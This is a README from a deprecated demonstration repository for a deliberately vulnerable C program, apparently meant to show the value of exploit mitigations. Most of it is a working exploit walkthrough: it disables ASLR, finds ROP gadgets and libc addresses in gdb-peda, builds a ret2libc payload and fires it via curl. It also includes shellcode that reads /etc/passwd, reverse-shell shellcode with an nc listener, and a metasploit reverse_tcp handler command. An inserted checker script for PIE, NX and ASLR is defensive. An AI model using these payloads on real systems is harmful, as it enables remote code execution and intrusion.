Please note that this repository has been deprecated and is no longer actively maintained by Polyverse Corporation. It may be removed in the future, but for now remains public for the benefit of any users.
Importantly, as the repository has not been maintained, it may contain unpatched security issues and other critical issues. Use at your own risk.
While it is not maintained, we would graciously consider any pull requests in accordance with our Individual Contributor License Agreement. https://github.com/polyverse/contributor-license-agreement
For any other issues, please feel free to contact [email protected]
pv build docker
docker run -it --rm --privileged -p 8080:80 --name c-exploit polyverse/c-exploit
echo 2 | tee /proc/sys/kernel/randomize_va_space
docker run -it --rm --privileged -p 8080:80 --name c-exploit polyverse/c-exploit
docker exec -it c-exploit /bin/sh
socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak
docker exec -it c-exploit /bin/sh
python leak.py  # You may need to try this three or more times. Don't know why.
echo 0 | tee /proc/sys/kernel/randomize_va_space
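The walkthrough below only works because ASLR is switched off (randomize_va_space = 0) and the target binary is linked without PIE and with an executable stack, which is why gadget and libc addresses stay stable between runs. The following checker is an editor's example, not code from the c-exploit repository: it parses an ELF64 header to report PIE and NX-stack status and interprets the sysctl value; make_elf builds a constructed minimal image for testing, and the optional path argument is a hypothetical usage.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header that declares stack permissions
PF_X = 0x1                  # executable bit in p_flags
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs. position-independent

def elf_hardening(data: bytes) -> dict:
    """Report whether a 64-bit little-endian ELF image is PIE and has an NX stack."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    # Without a PT_GNU_STACK entry the kernel falls back to an executable stack.
    nx_stack = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx_stack = not (p_flags & PF_X)
    return {"pie": e_type == ET_DYN, "nx_stack": nx_stack}

def aslr_level(sysctl_value: str) -> str:
    """Interpret /proc/sys/kernel/randomize_va_space as the walkthrough toggles it."""
    return {"0": "ASLR off: stack, libc and gadget addresses are stable across runs",
            "1": "partial ASLR: stack and mmap randomized, brk is not",
            "2": "full ASLR: stack, mmap and brk randomized"}[sysctl_value.strip()]

def make_elf(pie: bool, exec_stack: bool) -> bytes:
    """Constructed minimal ELF64 image (header + one PT_GNU_STACK entry) for testing."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    hdr = ident + struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC, 0x3E, 1,
                              0x400000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    flags = 0x6 | (PF_X if exec_stack else 0)  # PF_R | PF_W, optionally PF_X
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, flags, 0, 0, 0, 0, 0, 0x10)
    return hdr + phdr

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None  # hypothetical: path to ./overflow
    data = open(path, "rb").read() if path else make_elf(pie=False, exec_stack=True)
    print(elf_hardening(data))
    with open("/proc/sys/kernel/randomize_va_space") as f:
        print(aslr_level(f.read()))
```

A binary that reports pie=True and nx_stack=True together with a sysctl value of 2 breaks every hard-coded address this README relies on.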
# Determine offset of return address
gdb ./overflow
pattern_arg 100
gdb-peda$ run
gdb-peda$ x/wx $rsp
0x7fffffffe758: 0x41414341
gdb-peda$ pattern_offset 0x41414341
1094796097 found at offset: 17
gdb-peda$ print $rsp
$2 = (void *) 0x7fffffffe868
# Find a "pop rdi" gadget
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400a63 : (5fc3) pop rdi; ret
# Find "/bin/sh" somewhere
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b943e8 --> 0x68732f6e69622f ('/bin/sh')
# (Optional) Find "uname" somewhere
gdb-peda$ searchmem "uname"
Searching for 'uname' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7a47031 --> 0x636c00656d616e75 ('uname')
# Find the "system" call
gdb-peda$ print system
$1 = {<text variable, no debug info>} 0x7ffff7a72490 <__libc_system>
# Build the payload
python payload.py 17 0x00400a63 0x7ffff7b943e8 0x7ffff7a72490 > payload
cat payload | base64 > payload64
(Add a "=" to the end of payload64)
# Test locally
./overflow $(cat payload64)
# Or
gdb ./overflow
break main
run $(cat payload64)
c
# Test remotely
curl localhost/index.php?q=QUFBQUFBQUFBQUFBQUFBQUEDCkAAAAAAADFwpPf/fwAAkCSn9/9/AAAK=
export PWN=$(python -c 'print "\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41"')
./getenvaddr PWN ./overflow
PWN will be at 0x7fff62721e9c
python payload.py 17 0x7fff62721e9c > payload
cat payload | base64 > payload64
(Add a "=" to the end of payload64)
export PWN=$(python -c 'print "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x15\xb3\xc7\x44\x24\x04\xac\x10\x01\x1f\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"')
./getenvaddr PWN ./overflow
PWN will be at 0x7fffffffee78
python payload.py 17 0x7fffffffee78 > payload
cat payload | base64 > payload64
(Add a "=" to the end of payload64)
nc -v -l 5555
gdb-peda$ print system
$8 = {<text variable, no debug info>} 0x7ffff7a72490 <__libc_system>
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b943e8 --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400673 : (5fc3) pop rdi; ret
You can use this container in conjunction with polyverse-internal.jfrog.io/kali-metasploit. Run the following command:
docker run -it -p 5555:5555 polyverse-internal.jfrog.io/kali-metasploit msfconsole -x "use multi/handler; set payload linux/x86/shell_reverse_tcp; set LHOST $(docker run -it -p 5555:5555 polyverse-internal.jfrog.io/kali-metasploit ifconfig eth0 | grep inet | awk '{print $2}'); set LPORT 5555; exploit"
Then modify evil.c to use the LHOST and LPORT values from the metasploit container tty.